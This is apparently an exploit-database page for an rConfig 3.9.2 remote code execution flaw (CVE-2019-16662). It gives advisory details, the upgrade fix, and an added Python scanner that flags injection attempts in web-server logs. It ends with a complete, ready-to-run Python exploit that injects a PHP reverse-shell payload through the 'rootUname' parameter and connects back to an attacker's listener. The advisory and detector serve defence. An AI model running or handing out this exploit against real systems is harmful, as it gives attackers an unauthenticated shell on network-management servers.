Vendor: rConfig
By: Askar
CVSS: 9.8 (CRITICAL)
Vulnerability Type: Remote Code Execution
CWE: 78
Product Name: rConfig
Affected Version From: 3.9.2
Affected Version To: 3.9.2
Patch Exists: YES
Related CVE: CVE-2019-16662
CPE: a:rconfig:rconfig
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: CentOS 7.7 / PHP 7.2.22
2019

rConfig 3.9.2 – Remote Code Execution

rConfig is a web-based network device configuration management application. A vulnerability in rConfig 3.9.2 allows an unauthenticated attacker to execute arbitrary code on the target system. The 'ajaxServerSettingsChk.php' script, which is accessible through the '/install/lib/ajaxHandlers/' directory, does not validate the 'rootUname' parameter, so a specially crafted HTTP request carrying malicious code in that parameter results in arbitrary code execution on the vulnerable server.

Mitigation:

Upgrade to rConfig version 3.9.3 or later.
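
To look for attempts against this endpoint in web-server access logs, the following added example (not part of the original advisory or the Exploit-DB script) flags requests to the handler and marks those whose 'rootUname' value contains shell metacharacters. It assumes combined-format access logs and a GET request as in the script on this page; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Handler path and parameter named in the advisory (CVE-2019-16662).
VULN_PATH = "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"
PARAM = "rootUname"
# Characters that can break a value out of a shell command line (CWE-78).
SHELL_META = re.compile(r"[;|&`$<>(){}#'\"\\\r\n]")
# Combined log format: client, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Sep/2019:10:01:02 +0000] "GET /login.php HTTP/1.1" 200 512',
    f'203.0.113.9 - - [18/Sep/2019:10:02:10 +0000] "GET {VULN_PATH}?rootUname=root HTTP/1.1" 200 64',
    f'203.0.113.9 - - [18/Sep/2019:10:02:15 +0000] "GET {VULN_PATH}?rootUname=%3Bid%23 HTTP/1.1" 200 0',
]

def classify(line):
    """Return a finding dict for a request to the handler, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # Undo percent-encoding and duplicate slashes before comparing paths.
    path = re.sub(r"/{2,}", "/", unquote(parts.path)).lower()
    if VULN_PATH.lower() not in path:
        return None
    # parse_qs percent-decodes the values, so encoded metacharacters are seen.
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM, [])
    injected = any(SHELL_META.search(v) for v in values)
    return {
        "client": m["client"], "time": m["ts"], "status": int(m["status"]),
        "severity": "injection" if injected else "probe",
    }

def scan(lines):
    """Return findings for every log line that touches the handler."""
    return [f for f in map(classify, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "probe" finding on a production host still deserves review, since the handler lives under the installer directory that the script on this page checks for before sending its request.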

Exploit-DB raw data:

# Exploit Title: rConfig 3.9.2 - Remote Code Execution
# Date: 2019-09-18
# Exploit Author: Askar
# Vendor Homepage: https://rconfig.com/
# Software link: https://rconfig.com/download
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22
# CVE : CVE-2019-16662

#!/usr/bin/python

import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 4:
    print "[+] Usage : ./exploit.py target ip port"
    exit()

target = sys.argv[1]

ip = sys.argv[2]

port = sys.argv[3]

payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))

install_path = target + "/install"

req = requests.get(install_path, verify=False)
if req.status_code == 404:
    print "[-] Installation directory not found!"
    print "[-] Exploitation failed !"
    exit()
elif req.status_code == 200:
    print "[+] Installation directory found!"
url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload

print "[+] Triggering the payload"
print "[+] Check your listener !"

requests.get(url_to_send, verify=False)

